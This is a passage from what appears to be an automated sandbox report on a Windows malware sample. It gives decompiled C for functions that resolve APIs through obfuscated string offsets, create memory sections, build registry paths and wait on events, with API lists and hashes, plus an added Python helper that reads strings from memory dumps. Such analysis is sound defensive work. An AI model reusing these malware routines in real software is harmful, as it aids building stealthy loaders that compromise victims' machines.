                              • Part of subcall function 00F15F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FE0
                            • SysAllocString.OLEAUT32(00000000), ref: 00F1700E
                            • SysAllocString.OLEAUT32(?), ref: 00F17022
                            • SysAllocString.OLEAUT32(00000000), ref: 00F17034
                            • SysFreeString.OLEAUT32(00000000), ref: 00F17098
                            • SysFreeString.OLEAUT32(00000000), ref: 00F170A7
                            • SysFreeString.OLEAUT32(00000000), ref: 00F170B2
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                            • String ID:
                            • API String ID: 2831207796-0
                            • Opcode ID: 38b1cf6d52715183eb3ea1aba99287e3ef82fa0add2359c566450aec4bda876f
                            • Instruction ID: 2e3d0c9447d3748f41b72fbf8eb74bf0ec51eec0930a2891d9dade8c84f3532a
                            • Opcode Fuzzy Hash: 38b1cf6d52715183eb3ea1aba99287e3ef82fa0add2359c566450aec4bda876f
                            • Instruction Fuzzy Hash: F9314E32D00609EFDB01EFB8C844AEEB7B6AF49310F158465ED14EB120DB75AD46DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F16CE5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				intOrPtr _v8;
                            				intOrPtr _t23;
                            				intOrPtr _t26;
                            				_Unknown_base(*)()* _t28;
                            				intOrPtr _t30;
                            				_Unknown_base(*)()* _t32;
                            				intOrPtr _t33;
                            				_Unknown_base(*)()* _t35;
                            				intOrPtr _t36;
                            				_Unknown_base(*)()* _t38;
                            				intOrPtr _t39;
                            				_Unknown_base(*)()* _t41;
                            				intOrPtr _t44;
                            				struct HINSTANCE__* _t48;
                            				intOrPtr _t54;
                            
                            				_t54 = E00F155DC(0x20);
                            				if(_t54 == 0) {
                            					_v8 = 8;
                            				} else {
                            					_t23 =  *0xf1d2b8; // 0x48da5a8
                            					_t48 = GetModuleHandleA(_t23 + 0xf1e11a);
                            					_t26 =  *0xf1d2b8; // 0x48da5a8
                            					_v8 = 0x7f;
                            					_t28 = GetProcAddress(_t48, _t26 + 0xf1e782);
                            					 *(_t54 + 0xc) = _t28;
                            					if(_t28 == 0) {
                            						L8:
                            						E00F16DFA(_t54);
                            					} else {
                            						_t30 =  *0xf1d2b8; // 0x48da5a8
                            						_t32 = GetProcAddress(_t48, _t30 + 0xf1e76f);
                            						 *(_t54 + 0x10) = _t32;
                            						if(_t32 == 0) {
                            							goto L8;
                            						} else {
                            							_t33 =  *0xf1d2b8; // 0x48da5a8
                            							_t35 = GetProcAddress(_t48, _t33 + 0xf1e4ce);
                            							 *(_t54 + 0x14) = _t35;
                            							if(_t35 == 0) {
                            								goto L8;
                            							} else {
                            								_t36 =  *0xf1d2b8; // 0x48da5a8
                            								_t38 = GetProcAddress(_t48, _t36 + 0xf1e406);
                            								 *(_t54 + 0x18) = _t38;
                            								if(_t38 == 0) {
                            									goto L8;
                            								} else {
                            									_t39 =  *0xf1d2b8; // 0x48da5a8
                            									_t41 = GetProcAddress(_t48, _t39 + 0xf1e792);
                            									 *(_t54 + 0x1c) = _t41;
                            									if(_t41 == 0) {
                            										goto L8;
                            									} else {
                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                            										_t44 = E00F17562(_t54, _a8); // executed
                            										_v8 = _t44;
                            										if(_t44 != 0) {
                            											goto L8;
                            										} else {
                            											 *_a12 = _t54;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
			}

                            Instruction addresses of the listing above: 0x00f16cf4 to 0x00f16dc8 (the per-line address column did not survive extraction).

                            APIs
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetModuleHandleA.KERNEL32(?,00000020,?,74183966,00000000,?,?,?,00F187BD,?,?,?,?,00000000,00000000), ref: 00F16D0A
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D2C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D42
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D58
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D6E
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00F16D84
                              • Part of subcall function 00F17562: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00F16DA4), ref: 00F175BF
                              • Part of subcall function 00F17562: memset.NTDLL ref: 00F175E1
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 3012371009-0
                            • Opcode ID: a3f0d14cb5a9636651c732bcf40ca6862c2ed9198c64c959332552b96131c989
                            • Instruction ID: d869293507ed6391cf46f5843f1590518ddc72b75e2b8d5abc4adaff65484aa2
                            • Opcode Fuzzy Hash: a3f0d14cb5a9636651c732bcf40ca6862c2ed9198c64c959332552b96131c989
                            • Instruction Fuzzy Hash: 77219FB260020AEFDB50DF68DC44EFA77FCEB087507058165E809C7225D774E985AB70
                            Uniqueness

                            Uniqueness Score: -1.00%
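Every name that E00F16CE5 hands to GetModuleHandleA and GetProcAddress, like the ones in the fragment ending at 0x00f188cc, is computed at run time as *0xf1d2b8 plus a fixed offset; the listing records *0xf1d2b8 as 0x48da5a8 and resolves one such sum to 0x57f8d08. Those addresses lie well outside the image dumps listed under Memory Dump Source (0xF10000 to 0xF1F000), so the names have to be read from a dump of the heap region instead. The Python below is an added helper written for this report, not part of the sample or of Joe Sandbox: it converts the listing's offsets to absolute addresses, finds which dump covers each and reads the NUL-terminated string there. Dump sizes, the heap region's base (0x57F8000) and the placeholder strings seeded into it are all constructed for the example; the real names are not on this page.

```python
"""Added example for the Joe Sandbox listing of E00F16CE5; not the sample's code.

Resolves `*0xf1d2b8 + offset` string references to absolute addresses and
reads them out of whichever memory dump covers them.  All dump sizes and
contents below are constructed; the heap region is hypothetical.
"""
from typing import Dict, List, Optional, Tuple

STRING_TABLE_BASE = 0x48DA5A8   # *0xf1d2b8 as recorded in the listing
HEAP_BASE = 0x57F8000           # assumed base of a heap dump covering the string table

# Offsets exactly as they appear in E00F16CE5, keyed by where the result lands.
E00F16CE5_OFFSETS = {
    "module name":     0xF1E11A,   # GetModuleHandleA argument
    "export -> +0xc":  0xF1E782,
    "export -> +0x10": 0xF1E76F,
    "export -> +0x14": 0xF1E4CE,
    "export -> +0x18": 0xF1E406,
    "export -> +0x1c": 0xF1E792,
}


class Dump:
    """One memory dump: its load address plus raw bytes."""

    def __init__(self, name: str, base: int, data: bytes) -> None:
        self.name, self.base, self.data = name, base, data

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + len(self.data)

    def read_cstring(self, addr: int, limit: int = 256) -> bytes:
        """Bytes from addr up to the first NUL (or limit), as GetProcAddress would read them."""
        off = addr - self.base
        end = self.data.find(b"\x00", off, off + limit)
        return self.data[off:(end if end != -1 else off + limit)]


def absolute(offset: int, base: int = STRING_TABLE_BASE) -> int:
    """32-bit add, wrapping the way the sample's register arithmetic does."""
    return (base + offset) & 0xFFFFFFFF


def resolve(offsets: Dict[str, int], dumps: List[Dump]) -> Dict[str, Tuple[int, Optional[str], Optional[bytes]]]:
    """Map each label to (absolute address, covering dump name or None, string or None)."""
    out: Dict[str, Tuple[int, Optional[str], Optional[bytes]]] = {}
    for label, off in offsets.items():
        addr = absolute(off)
        hit = next((d for d in dumps if d.contains(addr)), None)
        out[label] = (addr, hit.name if hit else None, hit.read_cstring(addr) if hit else None)
    return out


def constructed_dumps(with_heap: bool) -> List[Dump]:
    """The image regions named in the report (sizes assumed) plus, optionally, a
    hypothetical heap dump seeded with placeholder strings at the resolved addresses."""
    pe = [Dump("F10000", 0xF10000, bytes(0x1000)),
          Dump("F11000", 0xF11000, bytes(0xB000)),
          Dump("F1C000", 0xF1C000, bytes(0x1000)),
          Dump("F1D000", 0xF1D000, bytes(0x2000)),
          Dump("F1F000", 0xF1F000, bytes(0x1000))]
    if not with_heap:
        return pe
    heap = bytearray(0x1000)
    for off in E00F16CE5_OFFSETS.values():
        s = ("str@%#x" % off).encode()   # obvious placeholder, not a real API name
        at = absolute(off) - HEAP_BASE
        heap[at:at + len(s)] = s
    return pe + [Dump("heap", HEAP_BASE, bytes(heap))]


if __name__ == "__main__":
    for label, (addr, where, text) in resolve(E00F16CE5_OFFSETS, constructed_dumps(True)).items():
        print("%-16s %#x  %-8s %r" % (label, addr, where or "(none)", text))
```

With only the image dumps supplied, every lookup reports no covering dump, which is the situation the report's dump list leaves an analyst in; swap the constructed heap dump for a real one of the same region and the same code yields the names.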

                            C-Code - Quality: 88%
                            			E00F148E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                            				signed int _v8;
                            				char _v12;
                            				signed int* _v16;
                            				char _v284;
                            				void* __esi;
                            				char* _t59;
                            				intOrPtr* _t60;
                            				void* _t62;
                            				intOrPtr _t64;
                            				char _t65;
                            				void* _t67;
                            				intOrPtr _t68;
                            				intOrPtr _t69;
                            				intOrPtr _t71;
                            				void* _t73;
                            				signed int _t81;
                            				void* _t91;
                            				void* _t92;
                            				char _t98;
                            				signed int* _t100;
                            				intOrPtr* _t101;
                            				void* _t102;
                            
                            				_t92 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t98 = _a16;
                            				if(_t98 == 0) {
                            					__imp__( &_v284,  *0xf1d36c);
                            					_t91 = 0x80000002;
                            					L6:
                            					_t59 = E00F165F6( &_v284,  &_v284);
                            					_a8 = _t59;
                            					if(_t59 == 0) {
                            						_v8 = 8;
                            						L29:
                            						_t60 = _a20;
                            						if(_t60 != 0) {
                            							 *_t60 =  *_t60 + 1;
                            						}
                            						return _v8;
                            					}
                            					_t101 = _a24;
                            					_t62 = E00F1691B(_t92, _t97, _t101, _t91, _t59); // executed
                            					if(_t62 != 0) {
                            						L27:
                            						E00F16DFA(_a8);
                            						goto L29;
                            					}
                            					_t64 =  *0xf1d2b0; // 0x57f9b78
                            					_t65 = E00F165F6(_t64,  *((intOrPtr*)(_t64 + 0xc)));
                            					_a24 = _t65;
                            					if(_t65 == 0) {
                            						L14:
                            						_t29 = _t101 + 0x14; // 0x102
                            						_t33 = _t101 + 0x10; // 0x3d00f1c0, executed
                            						_t67 = E00F16E41(_t97,  *_t33, _t91, _a8,  *0xf1d364,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                            						if(_t67 == 0) {
                            							_t68 =  *0xf1d2b8; // 0x48da5a8
                            							if(_t98 == 0) {
                            								_t69 = _t68 + 0xf1ea23;
                            							} else {
                            								_t69 = _t68 + 0xf1e8cb;
                            							}
                            							if(E00F15D44(_t69,  *0xf1d364,  *0xf1d368,  &_a24,  &_a16) == 0) {
                            								if(_t98 == 0) {
                            									_t71 =  *0xf1d2b8; // 0x48da5a8
                            									_t73 = E00F165F6(_t71 + 0xf1e83e, _t71 + 0xf1e83e);
                            									_t99 = _t73;
                            									if(_t73 == 0) {
                            										_v8 = 8;
                            									} else {
                            										_t47 = _t101 + 0x10; // 0x3d00f1c0
                            										E00F14FA0( *_t47, _t91, _a8,  *0xf1d368, _a24);
                            										_t49 = _t101 + 0x10; // 0x3d00f1c0
                            										E00F14FA0( *_t49, _t91, _t99,  *0xf1d360, _a16);
                            										E00F16DFA(_t99);
                            									}
                            								} else {
                            									_t40 = _t101 + 0x10; // 0x3d00f1c0
                            									E00F14FA0( *_t40, _t91, _a8,  *0xf1d368, _a24);
                            									_t43 = _t101 + 0x10; // 0x3d00f1c0, executed
                            									E00F14FA0( *_t43, _t91, _a8,  *0xf1d360, _a16); // executed
                            								}
                            								if( *_t101 != 0) {
                            									E00F16DFA(_a24);
                            								} else {
                            									 *_t101 = _a16;
                            								}
                            							}
                            						}
                            						goto L27;
                            					}
                            					_t21 = _t101 + 0x10; // 0x3d00f1c0, executed
                            					_t81 = E00F15607( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                            					if(_t81 == 0) {
                            						_t100 = _v16;
                            						if(_v12 == 0x28) {
                            							 *_t100 =  *_t100 & _t81;
                            							_t26 = _t101 + 0x10; // 0x3d00f1c0
                            							E00F16E41(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                            						}
                            						E00F16DFA(_t100);
                            						_t98 = _a16;
                            					}
                            					E00F16DFA(_a24);
                            					goto L14;
                            				}
                            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                            					goto L29;
                            				} else {
                            					_t97 = _a8;
                            					E00F1AA99(_t98, _a8,  &_v284);
                            					__imp__(_t102 + _t98 - 0x117,  *0xf1d36c);
                            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                            					_t91 = 0x80000003;
                            					goto L6;
                            				}
			}

                            Instruction addresses of the listing above: 0x00f148e5 to 0x00f14b05 (the per-line address column did not survive extraction).

                            APIs
                            • StrChrA.SHLWAPI(00F16096,0000005F,00000000,00000000,00000104), ref: 00F14918
                            • lstrcpy.KERNEL32(?,?), ref: 00F14945
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                              • Part of subcall function 00F14FA0: lstrlenW.KERNEL32(?,?,?,00F14AAE,3D00F1C0,80000002,00F16096,00F1A6E1,?,?,00F1A6E1,?,3D00F1C0,80000002,00F16096,?), ref: 00F14FC5
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • lstrcpy.KERNEL32(?,00000000), ref: 00F14967
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                            • String ID: ($\
                            • API String ID: 3924217599-1512714803
                            • Opcode ID: fb1c2dd5fbd1cc073be1ee21b21272fe0baf7283bafde02b6c9c2d1747599e92
                            • Instruction ID: 8410f1221bc1f4df88065b61e0a0064bea62e6c438a9c7c6d657db9c8eb51ee8
                            • Opcode Fuzzy Hash: fb1c2dd5fbd1cc073be1ee21b21272fe0baf7283bafde02b6c9c2d1747599e92
                            • Instruction Fuzzy Hash: 4B516B7250020AEFDF119F60DC41EEA7BB9FF48320F118164F92592161D739EAA5FB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 57%
                            			E00F1587D(signed int __edx) {
                            				signed int _v8;
                            				long _v12;
                            				CHAR* _v16;
                            				long _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t21;
                            				CHAR* _t22;
                            				CHAR* _t25;
                            				intOrPtr _t26;
                            				void* _t27;
                            				void* _t31;
                            				void* _t32;
                            				CHAR* _t36;
                            				CHAR* _t42;
                            				CHAR* _t43;
                            				CHAR* _t44;
                            				void* _t49;
                            				void* _t51;
                            				signed char _t56;
                            				intOrPtr _t58;
                            				signed int _t59;
                            				void* _t63;
                            				CHAR* _t67;
                            				CHAR* _t68;
                            				char* _t69;
                            				void* _t70;
                            
                            				_t61 = __edx;
                            				_v20 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				_t21 = E00F16DCB();
                            				if(_t21 != 0) {
                            					_t59 =  *0xf1d294; // 0x4000000a
                            					_t55 = (_t59 & 0xf0000000) + _t21;
                            					 *0xf1d294 = (_t59 & 0xf0000000) + _t21;
                            				}
                            				_t22 =  *0xf1d12c(0, 2); // executed
                            				_v16 = _t22;
                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                            					_t25 = E00F15203( &_v8,  &_v20); // executed
                            					_t54 = _t25;
                            					_t26 =  *0xf1d2b8; // 0x48da5a8
                            					if( *0xf1d294 > 5) {
                            						_t27 = _t26 + 0xf1e5cd;
                            					} else {
                            						_t27 = _t26 + 0xf1e9d9;
                            					}
                            					E00F13D42(_t27, _t27);
                            					_t31 = E00F15C7F(_t61,  &_v20,  &_v12); // executed
                            					if(_t31 == 0) {
                            						CloseHandle(_v20);
                            					}
                            					_t63 = 5;
                            					if(_t54 != _t63) {
                            						 *0xf1d2a8 =  *0xf1d2a8 ^ 0x81bbe65d;
                            						_t32 = E00F155DC(0x60);
                            						__eflags = _t32;
                            						 *0xf1d35c = _t32;
                            						if(_t32 == 0) {
                            							_push(8);
                            							_pop(0);
                            						} else {
                            							memset(_t32, 0, 0x60);
                            							_t49 =  *0xf1d35c; // 0x57f95b0
                            							_t70 = _t70 + 0xc;
                            							__imp__(_t49 + 0x40);
                            							_t51 =  *0xf1d35c; // 0x57f95b0
                            							 *_t51 = 0xf1e823;
                            						}
                            						__eflags = 0;
                            						_t54 = 0;
                            						if(0 == 0) {
                            							_t36 = RtlAllocateHeap( *0xf1d270, 0, 0x43);
                            							__eflags = _t36;
                            							 *0xf1d300 = _t36;
                            							if(_t36 == 0) {
                            								_push(8);
                            								_pop(0);
                            							} else {
                            								_t56 =  *0xf1d294; // 0x4000000a
                            								_t61 = _t56 & 0x000000ff;
                            								_t58 =  *0xf1d2b8; // 0x48da5a8
                            								_t55 = _t58 + 0xf1e55a;
                            								wsprintfA(_t36, _t58 + 0xf1e55a, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xf1c2a7);
                            							}
                            							__eflags = 0;
                            							_t54 = 0;
                            							if(0 == 0) {
                            								asm("sbb eax, eax");
                            								E00F1A303( ~_v8 &  *0xf1d2a8, 0xf1d00c); // executed
                            								_t42 = E00F1294D(0, _t55, _t63, 0xf1d00c); // executed
                            								_t54 = _t42;
                            								__eflags = _t54;
                            								if(_t54 != 0) {
                            									goto L30;
                            								}
                            								_t43 = E00F12551();
                            								__eflags = _t43;
                            								if(_t43 != 0) {
                            									__eflags = _v8;
                            									_t67 = _v12;
                            									if(_v8 != 0) {
                            										L29:
                            										_t44 = E00F15038(_t61, _t67, _v8); // executed
                            										_t54 = _t44;
                            										goto L30;
                            									}
                            									__eflags = _t67;
                            									if(__eflags == 0) {
                            										goto L30;
                            									}
                            									_t54 = E00F18BA7(__eflags,  &(_t67[4]));
                            									__eflags = _t54;
                            									if(_t54 == 0) {
                            										goto L30;
                            									}
                            									goto L29;
                            								}
                            								_t54 = 8;
                            							}
                            						}
                            					} else {
                            						_t68 = _v12;
                            						if(_t68 == 0) {
                            							L30:
                            							if(_v16 == 0 || _v16 == 1) {
                            								 *0xf1d128(); // executed
                            							}
                            							goto L34;
                            						}
                            						_t69 =  &(_t68[4]);
                            						do {
                            						} while (E00F162E1(_t63, _t69, 0, 1) == 0x4c7);
                            					}
                            					goto L30;
                            				} else {
                            					_t54 = _t22;
                            					L34:
                            					return _t54;
                            				}
                            			}
                            0x00f1587d
                            0x00f15887
                            0x00f1588a
                            0x00f1588d
                            0x00f15890
                            0x00f15897
                            0x00f15899
                            0x00f158a5
                            0x00f158a7
                            0x00f158a7
                            0x00f158b0
                            0x00f158b8
                            0x00f158bb
                            0x00f158d5
                            0x00f158e1
                            0x00f158e3
                            0x00f158e8
                            0x00f158f2
                            0x00f158ea
                            0x00f158ea
                            0x00f158ea
                            0x00f158f9
                            0x00f15906
                            0x00f1590d
                            0x00f15912
                            0x00f15912
                            0x00f1591b
                            0x00f1591e
                            0x00f15944
                            0x00f15950
                            0x00f15955
                            0x00f15957
                            0x00f1595c
                            0x00f15988
                            0x00f1598a
                            0x00f1595e
                            0x00f15962
                            0x00f15967
                            0x00f1596c
                            0x00f15973
                            0x00f15979
                            0x00f1597e
                            0x00f15984
                            0x00f1598b
                            0x00f1598d
                            0x00f1598f
                            0x00f1599e
                            0x00f159a4
                            0x00f159a6
                            0x00f159ab
                            0x00f159db
                            0x00f159dd
                            0x00f159ad
                            0x00f159ad
                            0x00f159b3
                            0x00f159c0
                            0x00f159c6
                            0x00f159ce
                            0x00f159d7
                            0x00f159de
                            0x00f159e0
                            0x00f159e2
                            0x00f159e9
                            0x00f159f6
                            0x00f159fb
                            0x00f15a00
                            0x00f15a02
                            0x00f15a04
                            0x00000000
                            0x00000000
                            0x00f15a06
                            0x00f15a0b
                            0x00f15a0d
                            0x00f15a14
                            0x00f15a18
                            0x00f15a1b
                            0x00f15a30
                            0x00f15a34
                            0x00f15a39
                            0x00000000
                            0x00f15a39
                            0x00f15a1d
                            0x00f15a1f
                            0x00000000
                            0x00000000
                            0x00f15a2a
                            0x00f15a2c
                            0x00f15a2e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f15a2e
                            0x00f15a11
                            0x00f15a11
                            0x00f159e2
                            0x00f15920
                            0x00f15920
                            0x00f15925
                            0x00f15a3b
                            0x00f15a40
                            0x00f15a48
                            0x00f15a48
                            0x00000000
                            0x00f15a40
                            0x00f1592b
                            0x00f1592e
                            0x00f15938
                            0x00f1593f
                            0x00000000
                            0x00f15a50
                            0x00f15a50
                            0x00f15a53
                            0x00f15a57
                            0x00f15a57

                            APIs
                              • Part of subcall function 00F16DCB: GetModuleHandleA.KERNEL32(?,00000000,00F15895,00000001), ref: 00F16DDA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00F15912
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • memset.NTDLL ref: 00F15962
                            • RtlInitializeCriticalSection.NTDLL(057F9570), ref: 00F15973
                              • Part of subcall function 00F18BA7: memset.NTDLL ref: 00F18BC1
                              • Part of subcall function 00F18BA7: lstrlenW.KERNEL32(00000000,?,00000005,?,00000000), ref: 00F18C07
                              • Part of subcall function 00F18BA7: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 00F18C12
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00F1599E
                            • wsprintfA.USER32 ref: 00F159CE
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                            • String ID:
                            • API String ID: 4246211962-0
                            • Opcode ID: af6db23e624557b69a9b0d680891c031d2fe793debef701876dfb08d8f00ad10
                            • Instruction ID: 08e4d8e551032c2a31069ad223719520da18385f5b907488c22d8f7597dfccbe
                            • Opcode Fuzzy Hash: af6db23e624557b69a9b0d680891c031d2fe793debef701876dfb08d8f00ad10
                            • Instruction Fuzzy Hash: 08512571E90A1DEBDB10ABA4DC85BEE33B9AF44B24F158526F101D7151E7B8C9C0BB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F14B5B(signed int _a4, signed int* _a8) {
                            				void* __ecx;
                            				void* __edi;
                            				signed int _t6;
                            				intOrPtr _t8;
                            				intOrPtr _t12;
                            				long _t14;
                            				void* _t18;
                            				WCHAR* _t19;
                            				long _t20;
                            				void* _t25;
                            				void* _t26;
                            				signed int* _t28;
                            				CHAR* _t30;
                            				long _t31;
                            				WCHAR** _t32;
                            
                            				_t6 =  *0xf1d2a8; // 0xd448b889
                            				_t32 = _a4;
                            				_a4 = _t6 ^ 0x109a6410;
                            				_t8 =  *0xf1d2b8; // 0x48da5a8
                            				_t25 = 0;
                            				_t30 = E00F1760A(_t8 + 0xf1e876, 1);
                            				if(_t30 != 0) {
                            					_t25 = CreateEventA(0xf1d2e4, 1, 0, _t30);
                            					E00F16DFA(_t30);
                            				}
                            				_t12 =  *0xf1d294; // 0x4000000a
                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                            					L12:
                            					_t28 = _a8;
                            					if(_t28 != 0) {
                            						 *_t28 =  *_t28 | 0x00000001;
                            					}
                            					_t14 = E00F187A1(_t32, _t26); // executed
                            					_t31 = _t14;
                            					if(_t31 == 0 && _t25 != 0) {
                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                            					}
                            					if(_t28 != 0 && _t31 != 0) {
                            						 *_t28 =  *_t28 & 0xfffffffe;
                            					}
                            					goto L20;
                            				} else {
                            					_t18 = E00F13309(); // executed
                            					if(_t18 != 0) {
                            						goto L12;
                            					}
                            					_t19 = StrChrW( *_t32, 0x20);
                            					if(_t19 != 0) {
                            						 *_t19 = 0;
                            						_t19 =  &(_t19[1]);
                            					}
                            					_t20 = E00F162E1(0,  *_t32, _t19, 0); // executed
                            					_t31 = _t20;
                            					if(_t31 == 0) {
                            						if(_t25 == 0) {
                            							L22:
                            							return _t31;
                            						}
                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                            						if(_t31 == 0) {
                            							L20:
                            							if(_t25 != 0) {
                            								CloseHandle(_t25);
                            							}
                            							goto L22;
                            						}
                            					}
                            					goto L12;
                            				}
                            			}
                            0x00f14b5c
                            0x00f14b63
                            0x00f14b6d
                            0x00f14b71
                            0x00f14b86
                            0x00f14b8d
                            0x00f14b91
                            0x00f14ba3
                            0x00f14ba5
                            0x00f14ba5
                            0x00f14baa
                            0x00f14bb1
                            0x00f14c06
                            0x00f14c06
                            0x00f14c0c
                            0x00f14c0e
                            0x00f14c0e
                            0x00f14c13
                            0x00f14c18
                            0x00f14c1c
                            0x00f14c2e
                            0x00f14c2e
                            0x00f14c32
                            0x00f14c38
                            0x00f14c38
                            0x00000000
                            0x00f14bc1
                            0x00f14bc1
                            0x00f14bc8
                            0x00000000
                            0x00000000
                            0x00f14bcf
                            0x00f14bd7
                            0x00f14bd9
                            0x00f14bdd
                            0x00f14bdd
                            0x00f14be5
                            0x00f14bea
                            0x00f14bee
                            0x00f14bf2
                            0x00f14c47
                            0x00f14c4d
                            0x00f14c4d
                            0x00f14c00
                            0x00f14c04
                            0x00f14c3b
                            0x00f14c3d
                            0x00f14c40
                            0x00f14c40
                            0x00000000
                            0x00f14c3d
                            0x00f14c04
                            0x00000000
                            0x00f14bee

                            APIs
                              • Part of subcall function 00F1760A: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,057F9B78,00000000,?,?,69B25F44,00000005,00F1D00C,?,?,?), ref: 00F17640
                              • Part of subcall function 00F1760A: lstrcpy.KERNEL32(00000000,00000000), ref: 00F17664
                              • Part of subcall function 00F1760A: lstrcat.KERNEL32(00000000,00000000), ref: 00F1766C
                            • CreateEventA.KERNEL32(00F1D2E4,00000001,00000000,00000000,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14B9C
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • StrChrW.SHLWAPI(00F160B5,00000020,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14BCF
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,00F160B5,00000000,00000000,?,00000000,?,00F160B5,?,?,?), ref: 00F14BFA
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14C28
                            • CloseHandle.KERNEL32(00000000,?,00000001,00000000,?,?,00000000,?,00F160B5,?,?,?), ref: 00F14C40
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 73268831-0
                            • Opcode ID: cd3b7ae6289d0fb6640c94f609b1a8fb474f3599b086b501a40a75b020f38cec
